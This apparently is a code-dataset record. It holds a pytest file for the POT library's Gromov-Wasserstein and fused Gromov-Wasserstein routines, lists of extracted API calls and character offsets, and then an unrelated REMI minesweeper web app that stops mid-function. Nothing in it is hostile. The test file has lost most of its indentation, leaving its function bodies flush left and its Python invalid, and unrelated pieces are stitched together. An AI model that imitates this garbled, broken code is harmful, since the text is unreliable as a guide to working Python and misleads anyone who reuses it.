# <NAME> <<EMAIL>>
#
# License: MIT License
import numpy as np
import ot
def test_gromov():
n_samples = 50 # nb samples
mu_s = np.array([0, 0])
cov_s = np.array([[1, 0], [0, 1]])
xs = ot.datasets.make_2D_samples_gauss(n_samples, mu_s, cov_s, random_state=4)
xt = xs[::-1].copy()
p = ot.unif(n_samples)
q = ot.unif(n_samples)
C1 = ot.dist(xs, xs)
C2 = ot.dist(xt, xt)
C1 /= C1.max()
C2 /= C2.max()
G = ot.gromov.gromov_wasserstein(C1, C2, p, q, 'square_loss', verbose=True)
    # check constraints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
Id = (1 / (1.0 * n_samples)) * np.eye(n_samples, n_samples)
np.testing.assert_allclose(
G, np.flipud(Id), atol=1e-04)
gw, log = ot.gromov.gromov_wasserstein2(C1, C2, p, q, 'kl_loss', log=True)
gw_val = ot.gromov.gromov_wasserstein2(C1, C2, p, q, 'kl_loss', log=False)
G = log['T']
np.testing.assert_allclose(gw, 0, atol=1e-1, rtol=1e-1)
np.testing.assert_allclose(gw, gw_val, atol=1e-1, rtol=1e-1) # cf log=False
    # check constraints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
def test_entropic_gromov():
n_samples = 50 # nb samples
mu_s = np.array([0, 0])
cov_s = np.array([[1, 0], [0, 1]])
xs = ot.datasets.make_2D_samples_gauss(n_samples, mu_s, cov_s, random_state=42)
xt = xs[::-1].copy()
p = ot.unif(n_samples)
q = ot.unif(n_samples)
C1 = ot.dist(xs, xs)
C2 = ot.dist(xt, xt)
C1 /= C1.max()
C2 /= C2.max()
G = ot.gromov.entropic_gromov_wasserstein(
C1, C2, p, q, 'square_loss', epsilon=5e-4, verbose=True)
    # check constraints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
gw, log = ot.gromov.entropic_gromov_wasserstein2(
C1, C2, p, q, 'kl_loss', epsilon=1e-2, log=True)
G = log['T']
np.testing.assert_allclose(gw, 0, atol=1e-1, rtol=1e-1)
    # check constraints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
def test_gromov_barycenter():
ns = 50
nt = 60
Xs, ys = ot.datasets.make_data_classif('3gauss', ns, random_state=42)
Xt, yt = ot.datasets.make_data_classif('3gauss2', nt, random_state=42)
C1 = ot.dist(Xs)
C2 = ot.dist(Xt)
n_samples = 3
Cb = ot.gromov.gromov_barycenters(n_samples, [C1, C2],
[ot.unif(ns), ot.unif(nt)
], ot.unif(n_samples), [.5, .5],
'square_loss', # 5e-4,
max_iter=100, tol=1e-3,
verbose=True)
np.testing.assert_allclose(Cb.shape, (n_samples, n_samples))
Cb2 = ot.gromov.gromov_barycenters(n_samples, [C1, C2],
[ot.unif(ns), ot.unif(nt)
], ot.unif(n_samples), [.5, .5],
'kl_loss', # 5e-4,
max_iter=100, tol=1e-3)
np.testing.assert_allclose(Cb2.shape, (n_samples, n_samples))
def test_gromov_entropic_barycenter():
ns = 50
nt = 60
Xs, ys = ot.datasets.make_data_classif('3gauss', ns, random_state=42)
Xt, yt = ot.datasets.make_data_classif('3gauss2', nt, random_state=42)
C1 = ot.dist(Xs)
C2 = ot.dist(Xt)
n_samples = 3
Cb = ot.gromov.entropic_gromov_barycenters(n_samples, [C1, C2],
[ot.unif(ns), ot.unif(nt)
], ot.unif(n_samples), [.5, .5],
'square_loss', 2e-3,
max_iter=100, tol=1e-3,
verbose=True)
np.testing.assert_allclose(Cb.shape, (n_samples, n_samples))
Cb2 = ot.gromov.entropic_gromov_barycenters(n_samples, [C1, C2],
[ot.unif(ns), ot.unif(nt)
], ot.unif(n_samples), [.5, .5],
'kl_loss', 2e-3,
max_iter=100, tol=1e-3)
np.testing.assert_allclose(Cb2.shape, (n_samples, n_samples))
def test_fgw():
n_samples = 50 # nb samples
mu_s = np.array([0, 0])
cov_s = np.array([[1, 0], [0, 1]])
xs = ot.datasets.make_2D_samples_gauss(n_samples, mu_s, cov_s, random_state=42)
xt = xs[::-1].copy()
ys = np.random.randn(xs.shape[0], 2)
yt = ys[::-1].copy()
p = ot.unif(n_samples)
q = ot.unif(n_samples)
C1 = ot.dist(xs, xs)
C2 = ot.dist(xt, xt)
C1 /= C1.max()
C2 /= C2.max()
M = ot.dist(ys, yt)
M /= M.max()
G, log = ot.gromov.fused_gromov_wasserstein(M, C1, C2, p, q, 'square_loss', alpha=0.5, log=True)
    # check constraints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence fgw
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence fgw
Id = (1 / (1.0 * n_samples)) * np.eye(n_samples, n_samples)
np.testing.assert_allclose(
G, np.flipud(Id), atol=1e-04) # cf convergence gromov
fgw, log = ot.gromov.fused_gromov_wasserstein2(M, C1, C2, p, q, 'square_loss', alpha=0.5, log=True)
G = log['T']
np.testing.assert_allclose(fgw, 0, atol=1e-1, rtol=1e-1)
    # check constraints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
def test_fgw_barycenter():
np.random.seed(42)
ns = 50
nt = 60
Xs, ys = ot.datasets.make_data_classif('3gauss', ns, random_state=42)
Xt, yt = ot.datasets.make_data_classif('3gauss2', nt, random_state=42)
ys = np.random.randn(Xs.shape[0], 2)
yt = np.random.randn(Xt.shape[0], 2)
C1 = ot.dist(Xs)
C2 = ot.dist(Xt)
n_samples = 3
X, C = ot.gromov.fgw_barycenters(n_samples, [ys, yt], [C1, C2], [ot.unif(ns), ot.unif(nt)], [.5, .5], 0.5,
fixed_structure=False, fixed_features=False,
p=ot.unif(n_samples), loss_fun='square_loss',
max_iter=100, tol=1e-3)
np.testing.assert_allclose(C.shape, (n_samples, n_samples))
np.testing.assert_allclose(X.shape, (n_samples, ys.shape[1]))
xalea = np.random.randn(n_samples, 2)
init_C = ot.dist(xalea, xalea)
X, C = ot.gromov.fgw_barycenters(n_samples, [ys, yt], [C1, C2], ps=[ot.unif(ns), ot.unif(nt)], lambdas=[.5, .5], alpha=0.5,
fixed_structure=True, init_C=init_C, fixed_features=False,
p=ot.unif(n_samples), loss_fun='square_loss',
max_iter=100, tol=1e-3)
np.testing.assert_allclose(C.shape, (n_samples, n_samples))
np.testing.assert_allclose(X.shape, (n_samples, ys.shape[1]))
init_X = np.random.randn(n_samples, ys.shape[1])
X, C, log = ot.gromov.fgw_barycenters(n_samples, [ys, yt], [C1, C2], [ot.unif(ns), ot.unif(nt)], [.5, .5], 0.5,
fixed_structure=False, fixed_features=True, init_X=init_X,
p=ot.unif(n_samples), loss_fun='square_loss',
max_iter=100, tol=1e-3, log=True)
np.testing.assert_allclose(C.shape, (n_samples, n_samples))
np.testing.assert_allclose(X.shape, (n_samples, ys.shape[1]))
|
[
"ot.unif",
"numpy.random.seed",
"numpy.eye",
"ot.datasets.make_data_classif",
"numpy.random.randn",
"ot.dist",
"ot.gromov.entropic_gromov_wasserstein",
"numpy.testing.assert_allclose",
"ot.gromov.fused_gromov_wasserstein",
"ot.gromov.fused_gromov_wasserstein2",
"numpy.flipud",
"ot.gromov.entropic_gromov_wasserstein2",
"numpy.array",
"ot.gromov.gromov_wasserstein2",
"ot.datasets.make_2D_samples_gauss",
"ot.gromov.gromov_wasserstein"
] |
[((250, 266), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (258, 266), True, 'import numpy as np\n'), ((280, 306), 'numpy.array', 'np.array', (['[[1, 0], [0, 1]]'], {}), '([[1, 0], [0, 1]])\n', (288, 306), True, 'import numpy as np\n'), ((319, 392), 'ot.datasets.make_2D_samples_gauss', 'ot.datasets.make_2D_samples_gauss', (['n_samples', 'mu_s', 'cov_s'], {'random_state': '(4)'}), '(n_samples, mu_s, cov_s, random_state=4)\n', (352, 392), False, 'import ot\n'), ((432, 450), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (439, 450), False, 'import ot\n'), ((460, 478), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (467, 478), False, 'import ot\n'), ((491, 506), 'ot.dist', 'ot.dist', (['xs', 'xs'], {}), '(xs, xs)\n', (498, 506), False, 'import ot\n'), ((517, 532), 'ot.dist', 'ot.dist', (['xt', 'xt'], {}), '(xt, xt)\n', (524, 532), False, 'import ot\n'), ((586, 657), 'ot.gromov.gromov_wasserstein', 'ot.gromov.gromov_wasserstein', (['C1', 'C2', 'p', 'q', '"""square_loss"""'], {'verbose': '(True)'}), "(C1, C2, p, q, 'square_loss', verbose=True)\n", (614, 657), False, 'import ot\n'), ((1028, 1092), 'ot.gromov.gromov_wasserstein2', 'ot.gromov.gromov_wasserstein2', (['C1', 'C2', 'p', 'q', '"""kl_loss"""'], {'log': '(True)'}), "(C1, C2, p, q, 'kl_loss', log=True)\n", (1057, 1092), False, 'import ot\n'), ((1109, 1174), 'ot.gromov.gromov_wasserstein2', 'ot.gromov.gromov_wasserstein2', (['C1', 'C2', 'p', 'q', '"""kl_loss"""'], {'log': '(False)'}), "(C1, C2, p, q, 'kl_loss', log=False)\n", (1138, 1174), False, 'import ot\n'), ((1202, 1255), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['gw', '(0)'], {'atol': '(0.1)', 'rtol': '(0.1)'}), '(gw, 0, atol=0.1, rtol=0.1)\n', (1228, 1255), True, 'import numpy as np\n'), ((1265, 1323), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['gw', 'gw_val'], {'atol': '(0.1)', 'rtol': '(0.1)'}), '(gw, gw_val, atol=0.1, rtol=0.1)\n', (1291, 1323), True, 'import numpy as np\n'), ((1635, 1651), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (1643, 1651), True, 'import numpy as np\n'), ((1665, 1691), 'numpy.array', 'np.array', (['[[1, 0], [0, 1]]'], {}), '([[1, 0], [0, 1]])\n', (1673, 1691), True, 'import numpy as np\n'), ((1704, 1778), 'ot.datasets.make_2D_samples_gauss', 'ot.datasets.make_2D_samples_gauss', (['n_samples', 'mu_s', 'cov_s'], {'random_state': '(42)'}), '(n_samples, mu_s, cov_s, random_state=42)\n', (1737, 1778), False, 'import ot\n'), ((1818, 1836), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (1825, 1836), False, 'import ot\n'), ((1846, 1864), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (1853, 1864), False, 'import ot\n'), ((1877, 1892), 'ot.dist', 'ot.dist', (['xs', 'xs'], {}), '(xs, xs)\n', (1884, 1892), False, 'import ot\n'), ((1903, 1918), 'ot.dist', 'ot.dist', (['xt', 'xt'], {}), '(xt, xt)\n', (1910, 1918), False, 'import ot\n'), ((1972, 2073), 'ot.gromov.entropic_gromov_wasserstein', 'ot.gromov.entropic_gromov_wasserstein', (['C1', 'C2', 'p', 'q', '"""square_loss"""'], {'epsilon': '(0.0005)', 'verbose': '(True)'}), "(C1, C2, p, q, 'square_loss', epsilon=\n 0.0005, verbose=True)\n", (2009, 2073), False, 'import ot\n'), ((2306, 2398), 'ot.gromov.entropic_gromov_wasserstein2', 'ot.gromov.entropic_gromov_wasserstein2', (['C1', 'C2', 'p', 'q', '"""kl_loss"""'], {'epsilon': '(0.01)', 'log': '(True)'}), "(C1, C2, p, q, 'kl_loss', epsilon=\n 0.01, log=True)\n", (2344, 2398), False, 'import ot\n'), ((2431, 2484), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['gw', '(0)'], {'atol': '(0.1)', 'rtol': '(0.1)'}), '(gw, 0, atol=0.1, rtol=0.1)\n', (2457, 2484), True, 'import numpy as np\n'), ((2776, 2836), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss"""', 'ns'], {'random_state': '(42)'}), "('3gauss', ns, random_state=42)\n", (2805, 2836), False, 'import ot\n'), ((2851, 2912), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss2"""', 'nt'], {'random_state': '(42)'}), "('3gauss2', nt, random_state=42)\n", (2880, 2912), False, 'import ot\n'), ((2925, 2936), 'ot.dist', 'ot.dist', (['Xs'], {}), '(Xs)\n', (2932, 2936), False, 'import ot\n'), ((2947, 2958), 'ot.dist', 'ot.dist', (['Xt'], {}), '(Xt)\n', (2954, 2958), False, 'import ot\n'), ((3362, 3422), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['Cb.shape', '(n_samples, n_samples)'], {}), '(Cb.shape, (n_samples, n_samples))\n', (3388, 3422), True, 'import numpy as np\n'), ((3755, 3816), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['Cb2.shape', '(n_samples, n_samples)'], {}), '(Cb2.shape, (n_samples, n_samples))\n', (3781, 3816), True, 'import numpy as np\n'), ((3903, 3963), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss"""', 'ns'], {'random_state': '(42)'}), "('3gauss', ns, random_state=42)\n", (3932, 3963), False, 'import ot\n'), ((3978, 4039), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss2"""', 'nt'], {'random_state': '(42)'}), "('3gauss2', nt, random_state=42)\n", (4007, 4039), False, 'import ot\n'), ((4052, 4063), 'ot.dist', 'ot.dist', (['Xs'], {}), '(Xs)\n', (4059, 4063), False, 'import ot\n'), ((4074, 4085), 'ot.dist', 'ot.dist', (['Xt'], {}), '(Xt)\n', (4081, 4085), False, 'import ot\n'), ((4540, 4600), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['Cb.shape', '(n_samples, n_samples)'], {}), '(Cb.shape, (n_samples, n_samples))\n', (4566, 4600), True, 'import numpy as np\n'), ((4975, 5036), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['Cb2.shape', '(n_samples, n_samples)'], {}), '(Cb2.shape, (n_samples, n_samples))\n', (5001, 5036), True, 'import numpy as np\n'), ((5108, 5124), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (5116, 5124), True, 'import numpy as np\n'), ((5138, 5164), 'numpy.array', 'np.array', (['[[1, 0], [0, 1]]'], {}), '([[1, 0], [0, 1]])\n', (5146, 5164), True, 'import numpy as np\n'), ((5177, 5251), 'ot.datasets.make_2D_samples_gauss', 'ot.datasets.make_2D_samples_gauss', (['n_samples', 'mu_s', 'cov_s'], {'random_state': '(42)'}), '(n_samples, mu_s, cov_s, random_state=42)\n', (5210, 5251), False, 'import ot\n'), ((5292, 5323), 'numpy.random.randn', 'np.random.randn', (['xs.shape[0]', '(2)'], {}), '(xs.shape[0], 2)\n', (5307, 5323), True, 'import numpy as np\n'), ((5361, 5379), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (5368, 5379), False, 'import ot\n'), ((5389, 5407), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (5396, 5407), False, 'import ot\n'), ((5420, 5435), 'ot.dist', 'ot.dist', (['xs', 'xs'], {}), '(xs, xs)\n', (5427, 5435), False, 'import ot\n'), ((5446, 5461), 'ot.dist', 'ot.dist', (['xt', 'xt'], {}), '(xt, xt)\n', (5453, 5461), False, 'import ot\n'), ((5515, 5530), 'ot.dist', 'ot.dist', (['ys', 'yt'], {}), '(ys, yt)\n', (5522, 5530), False, 'import ot\n'), ((5565, 5657), 'ot.gromov.fused_gromov_wasserstein', 'ot.gromov.fused_gromov_wasserstein', (['M', 'C1', 'C2', 'p', 'q', '"""square_loss"""'], {'alpha': '(0.5)', 'log': '(True)'}), "(M, C1, C2, p, q, 'square_loss', alpha=\n 0.5, log=True)\n", (5599, 5657), False, 'import ot\n'), ((6043, 6136), 'ot.gromov.fused_gromov_wasserstein2', 'ot.gromov.fused_gromov_wasserstein2', (['M', 'C1', 'C2', 'p', 'q', '"""square_loss"""'], {'alpha': '(0.5)', 'log': '(True)'}), "(M, C1, C2, p, q, 'square_loss', alpha=\n 0.5, log=True)\n", (6078, 6136), False, 'import ot\n'), ((6159, 6213), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['fgw', '(0)'], {'atol': '(0.1)', 'rtol': '(0.1)'}), '(fgw, 0, atol=0.1, rtol=0.1)\n', (6185, 6213), True, 'import numpy as np\n'), ((6465, 6483), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (6479, 6483), True, 'import numpy as np\n'), ((6528, 6588), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss"""', 'ns'], {'random_state': '(42)'}), "('3gauss', ns, random_state=42)\n", (6557, 6588), False, 'import ot\n'), ((6603, 6664), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss2"""', 'nt'], {'random_state': '(42)'}), "('3gauss2', nt, random_state=42)\n", (6632, 6664), False, 'import ot\n'), ((6677, 6708), 'numpy.random.randn', 'np.random.randn', (['Xs.shape[0]', '(2)'], {}), '(Xs.shape[0], 2)\n', (6692, 6708), True, 'import numpy as np\n'), ((6719, 6750), 'numpy.random.randn', 'np.random.randn', (['Xt.shape[0]', '(2)'], {}), '(Xt.shape[0], 2)\n', (6734, 6750), True, 'import numpy as np\n'), ((6763, 6774), 'ot.dist', 'ot.dist', (['Xs'], {}), '(Xs)\n', (6770, 6774), False, 'import ot\n'), ((6785, 6796), 'ot.dist', 'ot.dist', (['Xt'], {}), '(Xt)\n', (6792, 6796), False, 'import ot\n'), ((7164, 7223), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['C.shape', '(n_samples, n_samples)'], {}), '(C.shape, (n_samples, n_samples))\n', (7190, 7223), True, 'import numpy as np\n'), ((7229, 7290), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['X.shape', '(n_samples, ys.shape[1])'], {}), '(X.shape, (n_samples, ys.shape[1]))\n', (7255, 7290), True, 'import numpy as np\n'), ((7306, 7335), 'numpy.random.randn', 'np.random.randn', (['n_samples', '(2)'], {}), '(n_samples, 2)\n', (7321, 7335), True, 'import numpy as np\n'), ((7350, 7371), 'ot.dist', 'ot.dist', (['xalea', 'xalea'], {}), '(xalea, xalea)\n', (7357, 7371), False, 'import ot\n'), ((7751, 7810), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['C.shape', '(n_samples, n_samples)'], {}), '(C.shape, (n_samples, n_samples))\n', (7777, 7810), True, 'import numpy as np\n'), ((7816, 7877), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['X.shape', '(n_samples, ys.shape[1])'], {}), '(X.shape, (n_samples, ys.shape[1]))\n', (7842, 7877), True, 'import numpy as np\n'), ((7894, 7933), 'numpy.random.randn', 'np.random.randn', (['n_samples', 'ys.shape[1]'], {}), '(n_samples, ys.shape[1])\n', (7909, 7933), True, 'import numpy as np\n'), ((8326, 8385), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['C.shape', '(n_samples, n_samples)'], {}), '(C.shape, (n_samples, n_samples))\n', (8352, 8385), True, 'import numpy as np\n'), ((8391, 8452), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['X.shape', '(n_samples, ys.shape[1])'], {}), '(X.shape, (n_samples, ys.shape[1]))\n', (8417, 8452), True, 'import numpy as np\n'), ((908, 936), 'numpy.eye', 'np.eye', (['n_samples', 'n_samples'], {}), '(n_samples, n_samples)\n', (914, 936), True, 'import numpy as np\n'), ((984, 997), 'numpy.flipud', 'np.flipud', (['Id'], {}), '(Id)\n', (993, 997), True, 'import numpy as np\n'), ((3148, 3166), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (3155, 3166), False, 'import ot\n'), ((3596, 3614), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (3603, 3614), False, 'import ot\n'), ((4302, 4320), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (4309, 4320), False, 'import ot\n'), ((4801, 4819), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (4808, 4819), False, 'import ot\n'), ((5897, 5925), 'numpy.eye', 'np.eye', (['n_samples', 'n_samples'], {}), '(n_samples, n_samples)\n', (5903, 5925), True, 'import numpy as np\n'), ((5973, 5986), 'numpy.flipud', 'np.flipud', (['Id'], {}), '(Id)\n', (5982, 5986), True, 'import numpy as np\n'), ((3080, 3091), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (3087, 3091), False, 'import ot\n'), ((3093, 3104), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (3100, 3104), False, 'import ot\n'), ((3527, 3538), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (3534, 3538), False, 'import ot\n'), ((3540, 3551), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (3547, 3551), False, 'import ot\n'), ((4225, 4236), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (4232, 4236), False, 'import ot\n'), ((4238, 4249), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (4245, 4249), False, 'import ot\n'), ((4723, 4734), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (4730, 4734), False, 'import ot\n'), ((4736, 4747), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (4743, 4747), False, 'import ot\n'), ((6888, 6899), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (6895, 6899), False, 'import ot\n'), ((6901, 6912), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (6908, 6912), False, 'import ot\n'), ((7053, 7071), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (7060, 7071), False, 'import ot\n'), ((7640, 7658), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (7647, 7658), False, 'import ot\n'), ((8011, 8022), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (8018, 8022), False, 'import ot\n'), ((8024, 8035), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (8031, 8035), False, 'import ot\n'), ((8200, 8218), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (8207, 8218), False, 'import ot\n'), ((7447, 7458), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (7454, 7458), False, 'import ot\n'), ((7460, 7471), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (7467, 7471), False, 'import ot\n')]
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os.path
import random
import threading
import remi.gui as gui
from remi import start, App
class Cell(gui.TableItem):
"""
Represent a cell in the minefield map
"""
def __init__(self, width, height, x, y, game):
super(Cell, self).__init__('')
self.set_size(width, height)
self.x = x
self.y = y
self.has_mine = False
        self.state = 0  # 0 = unknown, 1 = flag, 2 = doubt
        self.opened = False
        self.nearest_mine = 0  # number of mines adjacent to this cell
self.game = game
self.style['font-weight'] = 'bold'
self.style['text-align'] = 'center'
self.style['background-size'] = 'contain'
if ((x + y) % 2) > 0:
self.style['background-color'] = 'rgb(255,255,255)'
else:
self.style['background-color'] = 'rgb(245,245,240)'
self.oncontextmenu.do(self.on_right_click, js_stop_propagation=True, js_prevent_default=True)
self.onclick.do(self.check_mine)
def on_right_click(self, widget):
""" Here with right click the change of cell is changed """
if self.opened:
return
self.state = (self.state + 1) % 3
self.set_icon()
self.game.check_if_win()
def check_mine(self, widget, notify_game=True):
if self.state == 1:
return
if self.opened:
return
self.opened = True
if self.has_mine and notify_game:
self.game.explosion(self)
self.set_icon()
return
if notify_game:
self.game.no_mine(self)
self.set_icon()
def set_icon(self):
self.style['background-image'] = "''"
if self.opened:
if self.has_mine:
self.style['background-image'] = "url('/my_resources:mine.png')"
else:
if self.nearest_mine > 0:
self.set_text(str(self.nearest_mine))
else:
self.style['background-color'] = 'rgb(200,255,100)'
return
if self.state == 2:
self.style['background-image'] = "url('/my_resources:doubt.png')"
if self.state == 1:
self.style['background-image'] = "url('/my_resources:flag.png')"
def add_nearest_mine(self):
self.nearest_mine += 1
class MyApp(App):
def __init__(self, *args):
res_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'res')
super(MyApp, self).__init__(*args, static_file_path={'my_resources': res_path})
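    # display_time (below) re-arms itself with a one-second threading.Timer
    # until stop_flag is set in on_close, acting as a simple game clock.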
def display_time(self):
self.lblTime.set_text('Play time: ' + str(self.time_count))
self.time_count += 1
if not self.stop_flag:
threading.Timer(1, self.display_time).start()
def main(self):
        # the arguments are width - height - layoutOrientationHorizontal
self.main_container = gui.Container(margin='0px auto')
self.main_container.set_size(1020, 600)
self.main_container.set_layout_orientation(gui.Container.LAYOUT_VERTICAL)
self.title = gui.Label('Mine Field GAME')
self.title.set_size(1000, 30)
self.title.style['margin'] = '10px'
self.title.style['font-size'] = '25px'
self.title.style['font-weight'] = 'bold'
        self.info = gui.Label('Collaborative minefield game. Enjoy.')
self.info.set_size(400, 30)
self.info.style['margin'] = '10px'
self.info.style['font-size'] = '20px'
self.lblMineCount = gui.Label('Mines')
self.lblMineCount.set_size(100, 30)
self.lblFlagCount = gui.Label('Flags')
self.lblFlagCount.set_size(100, 30)
self.time_count = 0
self.lblTime = gui.Label('Time')
self.lblTime.set_size(100, 30)
self.btReset = gui.Button('Restart')
self.btReset.set_size(100, 30)
self.btReset.onclick.do(self.new_game)
self.horizontal_container = gui.Container()
self.horizontal_container.style['display'] = 'block'
self.horizontal_container.style['overflow'] = 'auto'
self.horizontal_container.set_layout_orientation(gui.Container.LAYOUT_HORIZONTAL)
self.horizontal_container.style['margin'] = '10px'
self.horizontal_container.append(self.info)
imgMine = gui.Image('/my_resources:mine.png')
imgMine.set_size(30, 30)
self.horizontal_container.append([imgMine, self.lblMineCount])
imgFlag = gui.Image('/my_resources:flag.png')
imgFlag.set_size(30, 30)
self.horizontal_container.append([imgFlag, self.lblFlagCount, self.lblTime, self.btReset])
        self.minecount = 0  # number of mines in the map
        self.flagcount = 0  # flags placed by the players
self.link = gui.Link("https://github.com/rawpython/remi",
"This is an example of REMI gui library.")
self.link.set_size(1000, 20)
self.link.style['margin'] = '10px'
self.main_container.append([self.title, self.horizontal_container, self.link])
self.new_game(self)
self.stop_flag = False
self.display_time()
# returning the root widget
return self.main_container
def on_close(self):
self.stop_flag = True
super(MyApp, self).on_close()
def coord_in_map(self, x, y, w=None, h=None):
w = len(self.mine_matrix[0]) if w is None else w
h = len(self.mine_matrix) if h is None else h
return not (x > w - 1 or y > h - 1 or x < 0 or y < 0)
def new_game(self, widget):
self.time_count = 0
self.mine_table = gui.Table(margin='0px auto') # 900, 450
self.mine_matrix = self.build_mine_matrix(8, 8, 5)
self.mine_table.empty()
for x in range(0, len(self.mine_matrix[0])):
row = gui.TableRow()
for y in range(0, len(self.mine_matrix)):
row.append(self.mine_matrix[y][x])
self.mine_matrix[y][x].onclick.do(self.mine_matrix[y][x].check_mine)
self.mine_table.append(row)
# self.mine_table.append_from_list(self.mine_matrix, False)
self.main_container.append(self.mine_table, key="mine_table")
self.check_if_win()
self.set_root_widget(self.main_container)
def build_mine_matrix(self, w, h, minenum):
"""random fill cells with mines and increments nearest mines num in adiacent cells"""
self.minecount = 0
matrix = [[Cell(30, 30, x, y, self) for x in range(w)] for y in range(h)]
for i in range(0, minenum):
x = random.randint(0, w - 1)
y = random.randint(0, h - 1)
if matrix[y][x].has_mine:
continue
self.minecount += 1
matrix[y][x].has_mine = True
for coord in [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 1], [1, -1], [1, 0], [1, 1]]:
_x, _y = coord
if not self.coord_in_map(x + _x, y + _y, w, h):
continue
matrix[y + _y][x + _x].add_nearest_mine()
return matrix
def no_mine(self, cell):
"""opens nearest cells that are not near a mine"""
if cell.nearest_mine > 0:
return
self.fill_void_cells(cell)
def check_if_win(self):
"""Here are counted the flags. Is checked if the user win."""
self.flagcount = 0
win = True
for x in range(0, len(self.mine_matrix[0])):
for y in range(0, len(self.mine_matrix)):
if self.mine_matrix[y][x].state == 1:
self.flagcount += 1
if not self.mine_matrix[y][x].has_mine:
win = False
elif self.mine_matrix[y][x].has_mine:
win = False
self.lblMineCount.set_text("%s" % self.minecount)
self.lblFlagCount.set_text("%s" % self.flagcount)
if win:
self.dialog = gui.GenericDialog(title='You Win!', message='Game done in %s seconds' % self.time_count)
self.dialog.confirm_dialog.do(self.new_game)
self.dialog.cancel_dialog.do(self.new_game)
self.dialog.show(self)
def fill_void_cells(self, cell):
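        # Iterative flood fill: starting from the clicked empty cell, keep
        # opening neighbours until cells adjacent to a mine are reached.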
checked_cells = [cell, ]
while len(checked_cells) > 0:
for cell in checked_cells[:]:
checked_cells.remove(cell)
if (not self.mine_matrix[cell.y][cell.x].has_mine) and \
(self.mine_matrix[cell.y][cell.x].nearest_mine == 0):
for coord in [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 1], [1, -1], [1, 0], [1, 1]]:
_x, _y = coord
if not self.coord_in_map(cell.x + _x, cell.y + _y):
continue
if not self.mine_matrix[cell.y + _y][cell.x + _x].opened:
